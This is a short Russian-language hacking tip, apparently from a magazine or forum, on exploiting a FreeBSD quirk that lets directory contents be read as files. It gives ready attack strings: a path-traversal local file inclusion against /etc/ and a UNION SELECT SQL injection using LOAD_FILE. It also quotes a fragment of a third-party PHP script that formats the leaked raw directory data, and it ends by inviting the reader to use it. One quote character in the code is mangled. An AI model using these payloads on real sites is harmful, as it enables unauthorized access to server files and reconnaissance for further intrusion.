Ты, наверное, уже знаешь, что FreeBSD
позволяет читать (при наличии прав, конечно) не только файлы, но
и содержимое самих директорий. Допустим, есть локальный инклуд
или читалка файлов. Если в параметре указать не файл, а
директорию, то будет выведен ее листинг.
1. Предположим, у нас
есть локальный инклуд. С его помощью мы можем прочитать
содержимое любого каталога. Например:
site.com/file.php?file=../../../../../../etc/
2. И даже если мы имеем банальную SQL-Injection, багофича
FreeBSD придет к нам на помощь. Единственный нюанс: в СУБД
должны быть права на «file_priv».
site.com/file.php?file=-1+union+select+1,LOAD_FILE('/ etc/'),3/*
3. Почему это происходит, задумываться не будем, ибо это тема
для отдельной статьи. Для нас важно, что такая возможность
существует. Плохо лишь то, что при выводе данных в браузер
информация выглядит нечитабельно. К счастью для нас, эту
проблему уже решил Scipio, написав скрипт, который отлично
справляется с задачей, выводит файлы, папки и символические
ссылки в удобном и приятном глазу виде:
...
for ($i=0;$i<$ln;$i+=2)
{
$curhex=substr($s,$i,3);
$nexthex=substr($s,$i+4,1);
if (($curhex=='040') and ($nexthex>'1') and
($nexthex<’8’))
{
$pob="<br>".'<b>[DIR]</b> ';
$nam=TRUE;
$i+=4;
}
if (($curhex=='080')
and ($nexthex>'1')
and ($nexthex<'8'))
{
$pob="<br>".'[FILE] ';
$nam=TRUE;
$i+=4;
}
...
Как видишь, автор просто оптимизировал вывод данных
посредством анализа посторонних hex-кодов. Больше о скрипте ты
можешь прочитать по ссылке
https://forum.antichat.ru/threadnav55237-1-10.html. Там же
находится аналогичный сценарий от oRb’а. Выбирай любой и
пользуйся.
